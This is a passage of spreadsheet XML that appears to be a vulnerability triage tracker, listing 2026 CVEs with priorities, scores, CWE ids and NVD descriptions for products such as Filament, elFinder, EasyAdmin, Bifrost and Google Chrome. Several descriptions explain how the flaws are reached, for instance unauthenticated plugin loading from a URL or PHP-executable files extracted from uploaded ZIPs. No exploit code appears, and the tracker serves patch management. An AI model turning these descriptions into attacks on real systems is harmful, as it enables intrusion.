          <t>Filament is a collection of full-stack components for accelerated Laravel development. Prior to versions 4.12.0 and 5.7.0, incorrect challenge-form required-field handling allows app-based multi-factor authentication to be bypassed when recovery codes are enabled. Email-based multi-factor authentication is not affected. This issue is fixed in versions 4.12.0 and 5.7.0.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77567</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78839</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in AppNitro MachForm v30 allows attackers to execute arbitrary code via uploading a crafted .phar file.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78839</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81891</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, checkExtractItems() in php/elFinderVolumeDriver.class.php calls mimetypeInternalDetect() without passing the result through mimeTypeNormalize(). Because the .phtml, .phar, .php5, and .php3 extensions are absent from mime.types, the staticMimeMap entries that map them to text/x-php are not applied, and allowPutMime() permits extraction even when uploadDeny blocks text/x-php. An attacker with ZIP upload permission can extract PHP-executable files into a web-accessible files/ directory and achieve remote code execution when the server executes those extensions. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81891</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81892</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>EasyAdmin is a fast and modern admin generator for Symfony applications. From 4.0.0 until 4.29.16 and 5.5.1, EasyAdmin serves all backend requests through a single dashboard route and, for custom actions (Action::linkToRoute() and MenuItem::linkToRoute()), swaps the executed controller based on the routeName query parameter on the kernel.controller event. The swap happens after Symfony's security firewall has already evaluated access_control against the original dashboard URL, and the routeName value was not validated. As a result, a path-based access_control rule protecting the target route was never evaluated, so a low-privilege backend user who can reach a single EasyAdmin URL and knows a target route's name can execute that route's controller, bypassing the path-based rule. Only path-based protections are bypassed. Routes whose controller enforces its own authorization with #[IsGranted] or denyAccessUnlessGranted() remain protected because those checks are recomputed against the swapped-in controller. This issue is fixed in versions 4.29.16 and 5.5.1.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81892</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.10.0, httpcore2 fails to start TLS in src/httpcore2/httpcore2/_sync/socks_proxy.py and src/httpcore2/httpcore2/_async/socks_proxy.py when the remote origin uses wss through a SOCKS5 proxy because the TLS upgrade condition only recognizes https. HTTPX2 exposes the flaw through Client.websocket() and AsyncClient.websocket() from 2.6.0 through 2.9.1, so the opening handshake, query parameters, Authorization headers, cookies, and subsequent frames can cross the proxy path in plaintext without certificate verification. An attacker controlling or observing that path can read or modify traffic and impersonate the WebSocket server. This issue is fixed in httpcore2 2.10.0 and HTTPX2 2.10.0.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86242</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>reefs@jfrog.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>Bifrost HTTP transport before 2.0.0 accepts an enabled custom plugin whose path is an HTTP URL through unauthenticated POST /api/plugins when management authentication is disabled (the default, governance.auth_config.is_enabled=false). The shared-object loader treats an http-prefixed path as a download URL, writes the body to a temporary .so, and passes it to Go's plugin.Open. After a successful open, optional Init runs immediately with the supplied config as the Bifrost process user. On documented dynamically linked builds (DYNAMIC=1 / no static-link flags), which the vendor requires for custom Go plugins, plugin.Open is expected to succeed and this is unauthenticated remote code execution. On the published statically linked Docker image, plugin.Open fails with Dynamic loading not supported, so that build class is only server-side request forgery. Attack complexity is High because the attacker cannot force RCE on the default static image and a loadable plugin must match the host Go version, OS, architecture, and linkage. The 1.6.x HTTP transport line through 1.6.11 does not contain the fix.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86242</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86479</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18788, 
2026.1.14055, 
2025.3.161254 missing authorisation allowed access to restricted REST API resources via IDOR</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86479</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87016</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-287</t>
        </is>
      </c>
      <c r="R373"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S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87016</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87036</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87036</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87075</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87075</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87457</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr"/>
      <c r="M376" s="5" t="inlineStr"/>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr"/>
      <c r="Q376" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="R376" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87457</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87467</t>
        </is>
      </c>
      <c r="D377" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E377" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F377" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I377" s="5" t="inlineStr"/>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr"/>
      <c r="M377" s="5" t="inlineStr"/>
      <c r="N377" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O377" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P377" s="5" t="inlineStr"/>
      <c r="Q377" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R377" s="5" t="inlineStr">
        <is>
          <t>Race condition in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to potentially execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87467</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87471</t>
        </is>
      </c>
      <c r="D378" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E378" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F378" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I378" s="5" t="inlineStr"/>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L378" s="5" t="inlineStr"/>
      <c r="M378" s="5" t="inlineStr"/>
      <c r="N378" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O378" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P378" s="5" t="inlineStr"/>
      <c r="Q378" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R378" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87471</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87499</t>
        </is>
      </c>
      <c r="D379" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E379" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F379" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I379" s="5" t="inlineStr"/>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr"/>
      <c r="M379" s="5" t="inlineStr"/>
      <c r="N379" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O379" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P379" s="5" t="inlineStr"/>
      <c r="Q379" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R379" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87499</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87505</t>
        </is>
      </c>
      <c r="D380" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E380" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F380" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G380" s="5" t="inlineStr"/>
      <c r="H380" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I380" s="5" t="inlineStr"/>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L380" s="5" t="inlineStr"/>
      <c r="M380" s="5" t="inlineStr"/>
      <c r="N380" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O380" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P380" s="5" t="inlineStr"/>
      <c r="Q380" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R380" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted PDF file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87505</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87509</t>
        </is>
      </c>
      <c r="D381" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E381" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F381" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I381" s="5" t="inlineStr"/>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L381" s="5" t="inlineStr"/>
      <c r="M381" s="5" t="inlineStr"/>
      <c r="N381" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O381" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P381" s="5" t="inlineStr"/>
      <c r="Q381" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R381" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Updater in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87509</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87514</t>
        </is>
      </c>
      <c r="D382" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E382" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F382" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I382" s="5" t="inlineStr"/>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L382" s="5" t="inlineStr"/>
      <c r="M382" s="5" t="inlineStr"/>
      <c r="N382" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O382" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P382" s="5" t="inlineStr"/>
      <c r="Q382" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R382" s="5" t="inlineStr">
        <is>
          <t>Use after free in Views in Google Chrome prior to 153.0.8010.36 allowed a local attacker to execute arbitrary code outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87514</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87530</t>
        </is>
      </c>
      <c r="D383" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E383" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
